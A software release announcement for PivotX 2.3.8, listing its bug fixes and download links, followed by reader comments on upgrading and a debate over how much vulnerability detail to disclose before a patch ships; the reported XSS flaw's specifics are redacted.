PivotX 2.3.8 released.

We've just released a new maintenance update for PivotX. This is a recommended upgrade for all PivotX 2.x websites. For former security related issues and patches, see the page dedicated to Security issues.

These are the changes since PivotX 2.3.7:

  • Fixed bug that archive_list used more than once with a different type outputted the wrong number of links
  • New params for archive_list: 
    • amount (to limit the amount of output)
    • start and end (specify range so you can combine different types of output)
    • year (to specify what year should only be used)
  • Mobile theme updated
  • Added PivotX icon for not-found images.
  • Added PHP 5.5 compatibility fix.
  • Added Smarty security fix.
  • Minor update to mobile dashboard.
  • Fixed problem with more than 1 uploader in the editor.
  • Added delHook function.
  • Added file existence check before creating thumbnail to circumvent lots of unrelated warnings.
  • Introducing hidden setting 'email_start_text' to replace default text in notification mails.

The PivotX 2.3.8 release can be downloaded from this location: pivotx.net/files/pivotx_latest.zip (or pivotx.net/files/pivotx_latest.tgz, if you prefer.tgz files). For setup instructions, we point you to our documentation: Getting the files & installing. If you're having trouble downloading the files, you can also download them from our sourceforge mirror.

Posted by Bob den OtterWednesday 22 January 201413

thirteen comments

Thanks you!

Oleg (URL) - 23-01-’14 10:04

Would it be safe to update from v2.3.6 right to v2.3.8, or should we update to v2.3.7 in between?

The Doctor (URL) - 05-02-’14 03:58

It’s completely safe to skip 2.3.7 and go directly to 2.3.8.

Hans "hansfn" Nordhaug (Email ) - 05-02-’14 08:33

Hi, I’ve just taken over as admin on a site and it’s on version 2.2.6. Can I upgrade straight to the new version, or do I need to do it in steps?

Zozinderingler - 07-02-’14 15:58

As far as I can see, it should be completely fine to upgrade directly. (You should update ASAP since there are security issues with version 2.2.6.) Always back-up before upgrading ;-)

Hans "hansfn" Nordhaug (Email ) - 07-02-’14 17:59

You have an authenticated persistant XSS vuln in 2.3.8 where you can [details removed]. Seeing as how you have to be authenticated it doesn’t pose such a big security risk but there could be some whom are given access with normal user privileges whom can still do this. It still shouldn’t allow javascript to be used for [details removed]. I hope to see it fixed. -Anon

AnonFreeworld - 01-03-’14 09:23

Thx for the report, but this is not the way to report security issues. We have a dedicated security page that is linked to from the main menu of pivotx.net explaining where to report it. I have edited your comment slightly to not reveal to much detail to the public. I’ll fix the issue shortly.

Hans "hansfn" Nordhaug (Email ) - 01-03-’14 17:49

My apologies will use the security page if any further issues are found next time. Just in a rush.

AnonFreeworld - 01-03-’14 20:00

By redacting that information, you’ve also made it harder for us to write signatures to detect and block this attack so we don’t know what to look for if someone tries to use it. Attackers already know about it and can start using it, while the rest of us don’t know what to look out for. That pushes the balance of power farther away from the defenders by limiting actionable intel.

The Doctor (URL) - 02-03-’14 03:01

Hi, Doctor. Did we two have this same discussion when the terrible reset password bug was discovered or was that another PivotX user? Anyway, I still think responsible disclosure is the way to go. It means giving us at least a couple of days to create a patch/new release, before going public with the attack vector.

Hans "hansfn" Nordhaug (Email ) - 02-03-’14 14:41

We did, yes.

I’m all for responsible disclosure, but I’m also in favor of having something to go on that I can tell my clients and customers that they can use in the interim period between finding out and having an official patch. “There’s this bug and people are exploiting it, but I don’t have any details for you,” does not make for clients sleeping well. Nor does it make things easy for the network security projects who want to jump on building a countermeasure for this, only to find that they have nothing to go on.

The Doctor (URL) - 02-03-’14 18:38

OK, so we still disagree on how much information one should provide before the patches are available. I just don’t understand how you can have responsible disclosure and at the same time provide enough information (to the public) so network security projects can build a countermeasure. Do you have an example from other (big) projects that act like you expect? I’m just curious.

Anyway, the official patches are committed to SVN and the 2.3.9 release is coming tomorrow. I don’t think the issues warrant a blog post already tonight, but I guess you disagree ;-)

Hans "hansfn" Nordhaug (Email ) - 02-03-’14 22:28

Microsoft Server 2008’s DNS server.

Apple’s recent SSL screwup – we had enough information to not only get sigs in place but brief clients as well as the in-house userbase on what to watch out for and what the risks were. That kept a close call from being a compromise, in one case.

The remote code execution exploit in Mediawiki’s PDF handler.

The Doctor (URL) - 03-03-’14 04:52

For support questions please visit the PivotX forum.